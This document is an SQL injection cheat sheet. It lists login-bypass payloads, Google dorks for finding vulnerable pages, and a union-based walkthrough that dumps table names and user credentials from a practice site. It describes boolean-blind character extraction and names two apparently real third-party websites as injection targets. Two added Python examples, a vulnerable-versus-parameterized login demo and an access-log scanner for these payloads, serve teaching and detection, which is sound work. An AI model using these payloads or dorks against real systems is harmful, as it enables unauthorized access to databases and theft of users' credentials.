SQL Cheat Sheet

 _______________AUTHENTICATION BYPASS ATTACK__________________


1' or '1' = '1

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin' or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*
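As an added example that is not part of the original cheat sheet, the following Python script builds a constructed SQLite users table and shows why the payloads above work against a login that concatenates its input into the SQL text, and why the very same payloads fail against a parameterized query. The table, column names, usernames and passwords are all constructed for the demo.

```python
import sqlite3

# Constructed demo data (not from the original page): a tiny users table.
USERS = [("admin", "correct horse battery staple"), ("alice", "hunter2")]


def make_db():
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so a quote or a comment marker
    in the input becomes part of the SQL grammar instead of a data value."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a malformed query simply fails the login
    return row[0] if row else None


def login_safe(conn, username, password):
    """Binds the input as parameters; the database never parses it as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Legitimate credentials, then two payload shapes from the list above.
    for user, pw in [("alice", "hunter2"), ("admin' --", "x"), ("x", "' or '1'='1")]:
        print(repr(user), repr(pw), "-> vulnerable:", login_vulnerable(conn, user, pw),
              "| safe:", login_safe(conn, user, pw))
```

The fix is the bound parameter, not input filtering: with `?` placeholders the quote in `admin' --` is compared literally against the username column and no row matches. Note that the `#` and `--` comment forms on the list are MySQL syntax (MySQL also requires a space after `--`); SQLite, used here, honours `--` and `/*` but not `#`.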


inurl:admin_login.php

inurl:admin/login.php

inurl:admin-login.php

inurl:adminlogin.php


############Some Google dorks for SQL injection###########

inurl:sql.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:fiche_spectacle.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=


inurl: php?id=

inurl: asp?id=

inurl: net?id=


____________________ERROR & UNION SQL INJECTION__________________________

e.g. http://vulnsite.com/news.php?id=1   (test with id=1' or with id=2-1)

To provoke errors:

?id=0X01

?id=9999999999999999999999999999999999999999999999

?id=2"

?id=3") and '1'='1'

union select 1,2,3,4,5--+

php?id=-23 union select 1,2,3,4,5--+

.php?id=23 and false union select 1,2,3,4,5--+


testphp.vulnweb.com/artists.php?artist=-1 order by 4--

testphp.vulnweb.com/artists.php?artist=-1 order by 3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),3--

testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --

testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 -- 

union select 1,group_concat(uname,0x3a,pass,email),3 from users--


*******************************************************************************************

##################FOR BLIND SQL#################

https://www.thaibusinessnews.com/readnews.php?id=2114

https://www.hotelone.com.pk/article.php?id=15

There are two types of blind SQL injection: normal blind and totally blind.


How to check?

The injected condition is either true or false.

If the default page renders unchanged, the condition is "True"; if the page changes, it is "False".


Check whether a subselect (subquery) can be used; this is what the comparisons below rely on.


id=1 and (select 1)=1 // checks whether we can execute a subquery at all


and (select 1 from login limit 0,1)=1 // guessing method to find the table name


and (select substring(concat(1,password),1,1) from login limit 0,1)=1 // guessing the column name


and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 // compares the first character with the supplied ASCII value; if the condition is true, increase the value, and if it is false, we have found the character.

=====================================================================================================

MACHINE_IP/sqli-labs/Less-8/?id=1' OR 1 < 2 --+ = True


MACHINE_IP/sqli-labs/Less-8/?id=1' OR 1 > 2 --+ = False

In SQL there is a very useful function, SUBSTR(), which extracts a substring from a string, starting at any position.

It takes three arguments:

1. The text to operate on (in our case the database name)

2. The character position to start at

3. The number of characters to extract



AND (substr((select database()),1,1)) - this returns the first character of the database name.



1' AND (substr((select database()),1,1)) = 's' --+



MACHINE_IP/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+

Now try guessing the second letter using the comparison technique.


MACHINE_IP/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) < 115 --+
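As an added defensive example, not part of the original page, the following Python script scans web-server access-log lines for the payload families this cheat sheet lists: the ORDER BY column probing and UNION SELECT / information_schema reads of the error & union section, the OR 1=1 tautologies of the bypass list, and the ascii(substr(...)) character probes of the blind section above. The log lines, IP addresses, timestamps and paths are constructed for the demo; the regular expressions are my own heuristics and not a complete WAF ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in combined-log style (not from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /artists.php?artist=-1%20order%20by%204-- HTTP/1.1" 500 120
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /artists.php?artist=-1%20union%20select%201,database(),3-- HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /artists.php?artist=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20-- HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20%3D%20115%20--%2B HTTP/1.1" 200 300
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),2,1)))%20%3C%20115%20--%2B HTTP/1.1" 200 300
10.0.0.3 - - [01/Jan/2024:10:00:07 +0000] "POST /login.php HTTP/1.1" 302 0
10.0.0.11 - - [01/Jan/2024:10:00:08 +0000] "GET /news.php?id=1%27%20or%201%3D1-- HTTP/1.1" 200 512
"""

# One regex per payload family from the cheat sheet; applied to the decoded, lower-cased target.
PATTERNS = {
    "union_select":       re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "order_by_probe":     re.compile(r"\border\s+by\s+\d+"),
    "or_tautology":       re.compile(r"\bor\s+['\"]?1['\"]?\s*=\s*['\"]?1"),
    "blind_char_probe":   re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\("),
    "info_schema":        re.compile(r"\binformation_schema\."),
    "comment_terminator": re.compile(r"(?:--\+?|/\*|#)\s*$"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+)'
)


def parse_line(line):
    """Split one combined-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(target):
    """Return the names of every payload family found in a request target.
    The target is URL-decoded once; a production rule would also handle double encoding."""
    decoded = unquote_plus(target).lower()
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]


def scan_log(text):
    """Scan a block of log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["target"])
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                             "target": unquote_plus(rec["target"]), "hits": hits})
    return findings


def probes_per_ip(findings):
    """Count suspicious requests per source address."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


def blind_probe_ips(findings, threshold=2):
    """Boolean-blind extraction needs many requests that differ only in the probed
    position or compared value, so repeated character probes from one address are
    a stronger signal than any single request."""
    per_ip = {}
    for f in findings:
        if "blind_char_probe" in f["hits"]:
            per_ip[f["ip"]] = per_ip.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["status"], f["hits"], f["target"])
    print("requests per IP:", probes_per_ip(results))
    print("likely blind extraction from:", blind_probe_ips(results))
```

The per-request matches catch the union and tautology payloads on sight, while the blind section's `ascii(substr(...))` requests only become convincing as a series from one source, which is why the script also aggregates by IP. Note that line 2 returns a 500 status: the error-provoking probes listed earlier often show up as server errors before any data is returned, so a spike in 5xx responses on a parameterized endpoint is worth correlating with these matches.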
